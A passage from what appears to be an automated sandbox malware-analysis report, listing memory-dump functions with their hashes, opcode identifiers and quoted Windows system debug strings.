                                                                                                                                                              Function 015B2FA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: b063072e4f95b2da74a7ff45ee4c514d1db58980683e4da7ab4af81b9c2038fd
                                                                                                                                                              • Instruction ID: 50543cfa3b10ff94586cc70d707a79959f1872dbdf59b81bf2e0bdf83ea6a74a
                                                                                                                                                              • Opcode Fuzzy Hash: b063072e4f95b2da74a7ff45ee4c514d1db58980683e4da7ab4af81b9c2038fd
                                                                                                                                                              • Instruction Fuzzy Hash: 6590023120180406D100759D4C087470045A7D0712F59C415A5164955EC6A6C9916631
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 015B2E30 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: c901eadf53ea08e55180301ec47573158d395f945c498c3968153ec28adf6a3a
                                                                                                                                                              • Instruction ID: 115b949022054c1f699773aca08d775fb17994c8243ddd6d74ea0d99e823a523
                                                                                                                                                              • Opcode Fuzzy Hash: c901eadf53ea08e55180301ec47573158d395f945c498c3968153ec28adf6a3a
                                                                                                                                                              • Instruction Fuzzy Hash: 9690022130140406D102759D48146060049E7D1755F99C416E1424955DC6668A53A232
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 015B2EE0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 312a869fa733fe860a179d19dc458dab31b4bee5260c76b5e0a047cfe594ea74
                                                                                                                                                              • Instruction ID: 9008061171d8ec44ba6de810396f5fe5292e2faba51d24a0d26189a6f4ad4c9b
                                                                                                                                                              • Opcode Fuzzy Hash: 312a869fa733fe860a179d19dc458dab31b4bee5260c76b5e0a047cfe594ea74
                                                                                                                                                              • Instruction Fuzzy Hash: 3590026120180407D140799D4C046070045A7D0712F59C415A2064955ECA6A8D516235
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 015B2E80 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: fe4d07ebdc781cc8b442759cbaa522e1dbbcb87ff847a8f2e564abd3e1fd5c66
                                                                                                                                                              • Instruction ID: e6cb7c986f0acb9dedff162880add51d0ca0a9ec406eb394a88e550e4ef930f2
                                                                                                                                                              • Opcode Fuzzy Hash: fe4d07ebdc781cc8b442759cbaa522e1dbbcb87ff847a8f2e564abd3e1fd5c66
                                                                                                                                                              • Instruction Fuzzy Hash: B590022160140506D101759D4804616004AA7D0651F99C426A1024955ECA668A92A231
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 015B2EA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: d180db77d08a8604bf0be5857c7dc2b8a4e46fc03c1b1137438261a9cd00b6cc
                                                                                                                                                              • Instruction ID: ec3cd42797eb485048d30d88e9a538fadee9b3738b7816c18df2fe4141ba329a
                                                                                                                                                              • Opcode Fuzzy Hash: d180db77d08a8604bf0be5857c7dc2b8a4e46fc03c1b1137438261a9cd00b6cc
                                                                                                                                                              • Instruction Fuzzy Hash: 9E90027120140406D140759D48047460045A7D0711F59C415A5064954EC69A8ED56765
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 015B3010 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: af1cbb99dba1515c841841c6f6ceef33a05dfcb98cd69c9e3fe07ac45a9f5457
                                                                                                                                                              • Instruction ID: 9f1967f865f8ba18329c7cdc98ba8b76b0e7368f62468e4c122409d11259633b
                                                                                                                                                              • Opcode Fuzzy Hash: af1cbb99dba1515c841841c6f6ceef33a05dfcb98cd69c9e3fe07ac45a9f5457
                                                                                                                                                              • Instruction Fuzzy Hash: CC90022120184446D140769D4C04B0F4145A7E1612F99C41DA4156954CC95689555721
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 015B3090 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 71857e7fab6f6527a71be0ca0f56d9d87551c79cfd3426868a4d702536af8112
                                                                                                                                                              • Instruction ID: 120daaa2bcff8adb8a2b252dc845124100ea60ebb8a22f47714b061f720dde27
                                                                                                                                                              • Opcode Fuzzy Hash: 71857e7fab6f6527a71be0ca0f56d9d87551c79cfd3426868a4d702536af8112
                                                                                                                                                              • Instruction Fuzzy Hash: DF90022124140806D140759D88147070046E7D0A11F59C415A0024954DC6578A6567B1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 015B39B0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 850a1316647dcf65f9c237c2dcf2d8d8c8f5b8b9c7d8e24fddb5fdd7bbe76ee9
                                                                                                                                                              • Instruction ID: b675750a5b7c81157255025ff9a9ec6fa090a37b48d049a79b65c64841cba17c
                                                                                                                                                              • Opcode Fuzzy Hash: 850a1316647dcf65f9c237c2dcf2d8d8c8f5b8b9c7d8e24fddb5fdd7bbe76ee9
                                                                                                                                                              • Instruction Fuzzy Hash: F990022124545106D150759D48046164045B7E0611F59C425A0814994DC59689556321
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 015B3D70 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 60603113aa0b5411dba44915a2c8bd83908995d4738259700bd098d6ab25f545
                                                                                                                                                              • Instruction ID: fe722ef45e90dc2dfc7c11785a34788ead0f9997518386aab17e45dd410ff69e
                                                                                                                                                              • Opcode Fuzzy Hash: 60603113aa0b5411dba44915a2c8bd83908995d4738259700bd098d6ab25f545
                                                                                                                                                              • Instruction Fuzzy Hash: 9E90023520140406D510759D5C046460086A7D0711F59D815A0424958DC69589A1A221
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 015B3D10 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: ab046eb9544a0516d2c6a272e96172297cfcf34cdae16bd78e1d573f5218f760
                                                                                                                                                              • Instruction ID: 46c98c3e114d3ded14fb91eb211855548fbeb30ecf6d44e62e90898b99c390f1
                                                                                                                                                              • Opcode Fuzzy Hash: ab046eb9544a0516d2c6a272e96172297cfcf34cdae16bd78e1d573f5218f760
                                                                                                                                                              • Instruction Fuzzy Hash: 54900231202401469540769D5C04A4E4145A7E1712B99D819A0015954CC95589615321
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 015B2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                              • Instruction ID: c9fe3a98c54cfe70088fc24f8fa2d8c170b4a191a13e604ac2e8d9aec6ad448c
                                                                                                                                                              • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 015B2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ___swprintf_l
                                                                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                              • API String ID: 48624451-2108815105
                                                                                                                                                              • Opcode ID: e46c770cf7f0feb3bb708ba913f630ed604dac8146443377ded0d1e8afc9145b
                                                                                                                                                              • Instruction ID: ced4f857d53951c24ebaf2f0cf68a2d70c81092753a44e75f4c6127723dd39a4
                                                                                                                                                              • Opcode Fuzzy Hash: e46c770cf7f0feb3bb708ba913f630ed604dac8146443377ded0d1e8afc9145b
                                                                                                                                                              • Instruction Fuzzy Hash: 1A51D8B5A00216AFCB15DFAC88D49BEFBF8BB48240B548569F469DB641D334EE5087E0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 01622410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ___swprintf_l
                                                                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                              • API String ID: 48624451-2108815105
                                                                                                                                                              • Opcode ID: 758cc9dac00a8143e3e25cb2e5b62403230e4d788ca8c1854c31e5982589cdbf
                                                                                                                                                              • Instruction ID: fc390ad8068c5e287c176cfa9bb7c7f381ad423e6b953248e03823dcaf56d546
                                                                                                                                                              • Opcode Fuzzy Hash: 758cc9dac00a8143e3e25cb2e5b62403230e4d788ca8c1854c31e5982589cdbf
                                                                                                                                                              • Instruction Fuzzy Hash: A851F475A00A66AFDB31DF9CCCA097EBBF9AB44200B04845DE496DB681E774DA408B60
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 015A7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 015E46FC
                                                                                                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 015E4655
                                                                                                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 015E4725
                                                                                                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 015E4742
                                                                                                                                                              • ExecuteOptions, xrefs: 015E46A0
                                                                                                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 015E4787
                                                                                                                                                              • Execute=1, xrefs: 015E4713
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                              • API String ID: 0-484625025
                                                                                                                                                              • Opcode ID: f80b753b09ebcfa3340154666dcb854e807a69264f6ff05d137fc3eb11c99fda
                                                                                                                                                              • Instruction ID: 2eec66c2ba833380082d96f16abcc55b21f4fe93f933b1371d8e92c5a0142584
                                                                                                                                                              • Opcode Fuzzy Hash: f80b753b09ebcfa3340154666dcb854e807a69264f6ff05d137fc3eb11c99fda
                                                                                                                                                              • Instruction Fuzzy Hash: FB510C31A4021A7AEF21EB68DC95FED7BF8BF58304F440099D605AF191D7729A418F50
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 015BB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: __aulldvrm
                                                                                                                                                              • String ID: +$-$0$0
                                                                                                                                                              • API String ID: 1302938615-699404926
                                                                                                                                                              • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                                              • Instruction ID: 8241920b243fd5b58ba335ec421d417d5ea687194f0a99765e19443f72ae9605
                                                                                                                                                              • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                                              • Instruction Fuzzy Hash: AA81A270E052499EEF25CE6CC8D17FEBBB1BF45320F28465AE851AF291C7B49940CB51
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 016220E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ___swprintf_l
                                                                                                                                                              • String ID: %%%u$[$]:%u
                                                                                                                                                              • API String ID: 48624451-2819853543
                                                                                                                                                              • Opcode ID: ecefe437a9dbb1cb251bcb4b4bbe01b1aff5eb8fce92b3d469be8c4b0eb69a41
                                                                                                                                                              • Instruction ID: f22ea5e4a1f9cc605b4f62d35fbf1ecbd3b14f1990ea961ee98b366ee4962923
                                                                                                                                                              • Opcode Fuzzy Hash: ecefe437a9dbb1cb251bcb4b4bbe01b1aff5eb8fce92b3d469be8c4b0eb69a41
                                                                                                                                                              • Instruction Fuzzy Hash: 3B21657AA0052AABDB10DF79CC54EEE7BF8EF54641F54011AEA05E7240EB30DA118BA1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0159F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 015E02BD
                                                                                                                                                              • RTL: Re-Waiting, xrefs: 015E031E
                                                                                                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 015E02E7
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                              • API String ID: 0-2474120054
                                                                                                                                                              • Opcode ID: 4d4c0fac548d23e577b58a5081d407a5794730a5ff10c8b1d7426a6383142948
                                                                                                                                                              • Instruction ID: 1c5f6947e480d25751c479d787b4b773511a9b7a4ba0f231a752606b9d9e3240
                                                                                                                                                              • Opcode Fuzzy Hash: 4d4c0fac548d23e577b58a5081d407a5794730a5ff10c8b1d7426a6383142948
                                                                                                                                                              • Instruction Fuzzy Hash: 3AE19F706047429FDB29CF28C884B6ABBE1BB88314F140A5EF5A5CF2E1D7B4D945CB52
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 015ABED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 015E7B7F
                                                                                                                                                              • RTL: Re-Waiting, xrefs: 015E7BAC
                                                                                                                                                              • RTL: Resource at %p, xrefs: 015E7B8E
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                              • API String ID: 0-871070163
                                                                                                                                                              • Opcode ID: 3cce1fa87e45a07fd067c82587af2a8f213157917703fdd4debbd92d71158185
                                                                                                                                                              • Instruction ID: 6c9239b6c099f09337684d295e64e95eb72cb1d96e208d0be3bbefc30add86a1
                                                                                                                                                              • Opcode Fuzzy Hash: 3cce1fa87e45a07fd067c82587af2a8f213157917703fdd4debbd92d71158185
                                                                                                                                                              • Instruction Fuzzy Hash: AE41C0357407029FDB24CE29C840B6EB7E9FB88710F440A1DEA669F680EB71E8058BD1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 015AB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015E728C
                                                                                                                                                              Strings
                                                                                                                                                              • RTL: Re-Waiting, xrefs: 015E72C1
                                                                                                                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 015E7294
                                                                                                                                                              • RTL: Resource at %p, xrefs: 015E72A3
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                              • API String ID: 885266447-605551621
                                                                                                                                                              • Opcode ID: ebc3caac90bca813d3f6c7119089d5ff67c06a627b39f0529093a9f9bf568eb9
                                                                                                                                                              • Instruction ID: 6beabcdb57a44bad0d80fb9f9dbbdb9aad36baffafd9c0b6e3a335ae52e822e9
                                                                                                                                                              • Opcode Fuzzy Hash: ebc3caac90bca813d3f6c7119089d5ff67c06a627b39f0529093a9f9bf568eb9
                                                                                                                                                              • Instruction Fuzzy Hash: 2441D031A40203ABD725DE29CC41F6ABBE6FB98710F100A19F995EF240DB21F84287E1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 01622300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ___swprintf_l
                                                                                                                                                              • String ID: %%%u$]:%u
                                                                                                                                                              • API String ID: 48624451-3050659472
                                                                                                                                                              • Opcode ID: 81f3de916c414a030b1844a842e9fa9ede4ba5c4006ae9ec1f90cb21bef886c0
                                                                                                                                                              • Instruction ID: d7d412129b970ed8a1c948fab1230e9b24b873d600ed3336f0f537ab20453b0e
                                                                                                                                                              • Opcode Fuzzy Hash: 81f3de916c414a030b1844a842e9fa9ede4ba5c4006ae9ec1f90cb21bef886c0
                                                                                                                                                              • Instruction Fuzzy Hash: 50318472A006299FDB60DE2DCC50BEEB7F8FF54610F44455AE949E7240EB30AA548FA0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 015B7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: __aulldvrm
                                                                                                                                                              • String ID: +$-
                                                                                                                                                              • API String ID: 1302938615-2137968064
                                                                                                                                                              • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                                              • Instruction ID: c31b3ed0165bbb7ed1015f30409ecd3ed9211c3c8ca5ff26823f2655d013780d
                                                                                                                                                              • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                                              • Instruction Fuzzy Hash: DE918071E0021A9EEB24DF6DC8C16FEBBA5BFC8760F14451AE965AF2C0E73099408B55
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 01579126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: $$@
                                                                                                                                                              • API String ID: 0-1194432280
                                                                                                                                                              • Opcode ID: 31b13502bb314a300c3952c2ffc0d4af129876ac37d814b2a31734374e940d35
                                                                                                                                                              • Instruction ID: 5f9ab76fb1cdfa531536aece7b7f408da4ae5cc9ca70efc95cc1c168661d2c07
                                                                                                                                                              • Opcode Fuzzy Hash: 31b13502bb314a300c3952c2ffc0d4af129876ac37d814b2a31734374e940d35
                                                                                                                                                              • Instruction Fuzzy Hash: 06811C71D0026A9BDB31DB58DC45BEEB7B4BB48714F0041DAEA1ABB250E7305E84CFA0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Executed Functions

                                                                                                                                                              Function 05012378 Relevance: .1, Instructions: 112COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
